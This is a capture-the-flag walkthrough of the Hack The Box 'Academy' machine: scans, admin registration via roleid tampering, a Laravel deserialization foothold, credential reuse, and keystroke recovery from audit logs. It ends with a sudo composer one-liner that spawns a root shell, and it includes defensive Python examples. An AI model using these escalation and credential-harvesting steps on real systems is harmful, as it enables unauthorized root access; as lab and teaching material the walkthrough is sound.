Basic Information

Port Scan

The usual 22 and 80:

$ nmap -sC -sV -Pn 10.10.10.215
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-09 14:15 CST
Nmap scan report for 10.10.10.215
Host is up (0.072s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.03 seconds

80

A hosts entry is needed first:

10.10.10.215 academy.htb

Ordinary registration and login:

HTB has just launched Academy, so this week's box is themed on it:

admin.php

A quick directory scan finds admin.php, which requires a login; the account we registered earlier cannot log in there:

➜  Academy gobuster dir -u http://academy.htb/ -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://academy.htb/
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/29 21:22:37 Starting gobuster
===============================================================
/register.php (Status: 200)
/login.php (Status: 200)
/home.php (Status: 302)
/index.php (Status: 200)
/config.php (Status: 200)
/admin.php (Status: 200)
===============================================================
2020/10/29 21:22:49 Finished
===============================================================

roleid

Note that the registration request carries a roleid parameter, default 0; the server trusts it, so resending the request with roleid=1 registers an administrator account:
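The flaw behind that roleid trick is the server copying a client-supplied field straight into the user record. The following is an added example (not code from the writeup or from the box) that models such a registration handler beside a hardened one that allow-lists the writable fields and sets the role server-side; the function names, the hashing helper and the two POST dictionaries are assumptions for illustration, and the only detail taken from the page is that the form carries roleid=0 and an attacker can resubmit it as roleid=1.

```python
"""Added example: why trusting a client-supplied roleid is dangerous.

register_vulnerable() mirrors the flaw on the box (every POST field,
including roleid, is written to the user row). register_hardened()
accepts only an allow-list of fields and fixes the role server-side.
Names and sample requests below are assumptions made for this example.
"""
import hashlib

ROLE_USER, ROLE_ADMIN = 0, 1

# Constructed stand-in for what the browser normally submits (hidden roleid=0) ...
NORMAL_POST = {"uid": "alice", "password": "hunter2", "confirm": "hunter2", "roleid": "0"}
# ... and the same request replayed through a proxy with roleid changed to 1.
TAMPERED_POST = {"uid": "mallory", "password": "x", "confirm": "x", "roleid": "1"}


def _hash(password: str) -> str:
    """Illustrative only; a real app should use bcrypt/argon2 (PHP password_hash)."""
    return hashlib.sha256(password.encode()).hexdigest()


def register_vulnerable(post: dict) -> dict:
    """Trusts every field in the request, including the role (the bug)."""
    if post["password"] != post["confirm"]:
        raise ValueError("passwords do not match")
    return {
        "username": post["uid"],
        "password_hash": _hash(post["password"]),
        # Attacker-controlled: roleid=1 makes the new account an admin.
        "roleid": int(post.get("roleid", ROLE_USER)),
    }


def register_hardened(post: dict) -> dict:
    """Allow-list the writable fields; the role is never taken from the client."""
    allowed = {"uid", "password", "confirm"}
    unexpected = set(post) - allowed          # worth logging: signals tampering
    if post["password"] != post["confirm"]:
        raise ValueError("passwords do not match")
    return {
        "username": post["uid"],
        "password_hash": _hash(post["password"]),
        "roleid": ROLE_USER,                  # fixed server-side; promote via admin UI only
        "rejected_fields": sorted(unexpected),
    }


def is_admin(user_row: dict) -> bool:
    """The check admin.php effectively performs on login."""
    return user_row["roleid"] == ROLE_ADMIN
```

The hardened handler also records which unexpected fields a request carried; a registration that arrives with roleid (or any field the form does not send) is a cheap detection signal for this kind of parameter tampering.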

That yields a new hostname; add it to hosts in the same way and browse to it:

10.10.10.215 academy.htb dev-staging-01.academy.htb

dev-staging-01.academy.htb

Laravel is running with debug mode on and dumps a large amount of debugging information:

Among it is a token; searching on it turns up an exploitable vulnerability:

Laravel deserialization

The public exploit lands a shell as www-data directly. Mind the parameters: rhosts is the main domain and vhost is the subdomain:

python3 -c 'import pty; pty.spawn("/bin/bash")'   # upgrade the raw reverse shell to an interactive PTY

Laravel .env config

Since it is Laravel, the database credentials sit in the .env file in the application root:

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

user flag

List the local users (for example from /etc/passwd); the cry0l1t3 user accepts this same password over SSH (password reuse), which gives user.txt:

audit log

The password for the mrb3n account turns up in the audit log, where pam_tty_audit has recorded the keystrokes typed at a su prompt:
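Those audit records store the typed characters hex-encoded in the data= field of type=TTY entries, which is what makes a password typed at su recoverable by anyone who can read audit.log. The following is an added example (not code from the writeup) that decodes such records; the three sample log lines are constructed for this example, with placeholder timestamps, pids and session ids rather than values taken from the box.

```python
"""Added example: recover keystrokes from Linux audit TTY records.

When pam_tty_audit is enabled, auditd writes a `type=TTY` record per line
typed on the terminal, with the keystrokes hex-encoded in data=. A password
typed at `su` is logged under comm="su". The log below is constructed for
this example (timestamps/pids/ses are placeholders).
"""
import re

SAMPLE_AUDIT_LOG = """\
type=USER_AUTH msg=audit(1597199291.001:82): pid=2520 uid=1002 auid=1002 ses=7 msg='op=PAM:authentication acct="cry0l1t3" exe="/usr/bin/sudo" res=failed'
type=TTY msg=audit(1597199292.114:83): tty pid=2520 uid=1002 auid=1002 ses=7 major=4 minor=1 comm="bash" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2521 uid=1002 auid=1002 ses=7 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199295.203:85): tty pid=2520 uid=1002 auid=1002 ses=7 major=4 minor=1 comm="bash" data=6C73202D6C610A
"""

# comm= names the program reading the TTY; data= is the hex of what was typed.
TTY_RE = re.compile(r'^type=TTY .*?comm="(?P<comm>[^"]*)" data=(?P<hex>[0-9A-Fa-f]+)')


def decode_tty_records(log_text: str) -> list:
    """Return (comm, decoded_keystrokes) for every type=TTY record in the log."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.match(line)
        if not m:
            continue                      # not a TTY record (USER_AUTH, SYSCALL, ...)
        keys = bytes.fromhex(m.group("hex")).decode("utf-8", errors="replace")
        records.append((m.group("comm"), keys))
    return records


def find_su_passwords(records: list) -> list:
    """Keystrokes captured while `su` owned the TTY are its password prompt input."""
    return [keys.rstrip("\n") for comm, keys in records if comm == "su"]


def replay_session(records: list) -> str:
    """Reconstruct the whole typed session, masking the su password lines."""
    out = []
    for comm, keys in records:
        out.append("********" if comm == "su" else keys.rstrip("\n"))
    return "\n".join(out)
```

On a host where auditd is installed, `aureport --tty` produces the same decoding from /var/log/audit/audit.log. The defensive takeaway is the mirror image: pam_tty_audit with logging of passwords enabled, combined with an audit log readable by an unprivileged user, turns every su or sudo prompt into a credential store.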

Privilege escalation information

mrb3n : mrb3n_Ac@d3my!

The mrb3n account is allowed to run composer as root via sudo:

Exploitation (composer runs the scripts defined in composer.json, so a crafted working directory is enough):

root flag

Escalate straight to root and read root.txt:

TF=$(mktemp -d)                                  # scratch project dir we control
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json   # script "x" spawns a shell on composer's inherited fd 3
sudo composer --working-dir=$TF run-script x     # composer runs as root and executes script x
